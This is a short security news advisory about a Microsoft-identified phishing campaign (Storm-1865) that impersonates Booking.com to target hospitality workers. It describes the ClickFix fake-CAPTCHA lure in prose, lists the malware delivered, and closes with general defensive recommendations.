In a recent cybersecurity alert, Microsoft has identified an ongoing phishing campaign targeting the hospitality sector by impersonating the online travel agency Booking.com. This campaign employs a sophisticated social engineering technique known as “ClickFix” to distribute credential-stealing malware, aiming to facilitate financial fraud and data theft.
Campaign Overview
Initiated in December 2024, the phishing operation, tracked by Microsoft as Storm-1865, specifically targets individuals within hospitality organizations across North America, Oceania, South and Southeast Asia, and Europe. The attackers send deceptive emails purporting to be from Booking.com, addressing topics such as negative guest reviews, account verification, online promotion opportunities, or requests from prospective guests. These emails contain links or PDF attachments that direct recipients to malicious websites designed to mimic legitimate Booking.com pages.
The ClickFix Technique
The hallmark of this campaign is the use of the ClickFix social engineering technique. Upon clicking the malicious link, users are presented with a fake CAPTCHA overlay on a webpage resembling Booking.com. To proceed, users are instructed to perform a series of actions:T
- Press a keyboard shortcut (e.g., Windows + R) to open the Windows Run dialog.
- Paste a command copied to their clipboard by the malicious webpage
- Execute the command, which initiates the download of malware onto their system.
This method exploits users’ problem-solving tendencies, prompting them to inadvertently execute malicious code.
Malware Deployed
The campaign delivers various types of malware, including:
- XWorm: A remote access trojan (RAT) that allows attackers to control infected systems.
- Lumma Stealer: An information stealer targeting credentials and financial data.
- VenomRAT and AsyncRAT: RATs facilitating unauthorized access and data exfiltration.
- Danabot: A banking trojan known for stealing financial information
- NetSupport RAT: A legitimate remote administration tool misused for malicious purposes.
These payloads enable attackers to harvest sensitive information, conduct financial fraud, and maintain persistent access to compromised systems.
Recommendations for Organizations
To mitigate the risks associated with this phishing campaign, organizations, particularly in the hospitality sector, should consider the following measures:
- User Education: Train employees to recognize phishing attempts, especially unsolicited emails requesting urgent actions or containing unexpected attachments or links.
- Email Filtering: Implement advanced email filtering solutions to detect and block phishing emails before they reach end-users.
- Endpoint Protection: Deploy comprehensive endpoint security solutions capable of detecting and preventing the execution of malicious code.
- Incident Response Planning: Develop and regularly update incident response plans to address potential security breaches promptly and effectively.
By staying vigilant and adopting proactive security measures, organizations can defend against sophisticated phishing campaigns like Storm-1865 and protect their sensitive information from cyber threats.